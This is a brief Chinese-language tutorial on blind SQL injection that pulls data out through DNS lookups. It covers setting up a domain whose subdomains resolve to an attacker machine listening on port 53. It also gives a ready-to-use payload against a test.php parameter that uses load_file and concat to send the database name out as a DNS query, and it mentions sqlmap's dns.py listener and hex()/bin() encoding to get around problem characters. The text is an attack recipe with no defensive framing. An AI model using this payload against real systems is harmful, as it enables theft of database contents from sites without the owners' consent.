一、准备一个自己的域名
- 利用DNS进行sql盲注需要一个拥有可以修改dns权限的域名,然后需要在你的DNS服务器上把需要注入的域名委托到攻击机上,也就是当请求你域名中的子域的解析请求都会解析到攻击机,然后我们在攻击机监听53
端口即可。
二、构造注入语句
- 注入语句:
http://域名/test.php?user=root' and load_file(concat('\\\\',(select database()),'添加的子域名\\aaa'))#
可以利用sqlmap中的dns.py脚本监听53端口。最后在dns.py脚本的解析请求中即可看到注入内容。
三、绕过字符
在我们获取的数据中,如果包含字符,那么解析就可能出现错误,这时可以使用字符编码绕过,例如hex()函数,bin()函数等。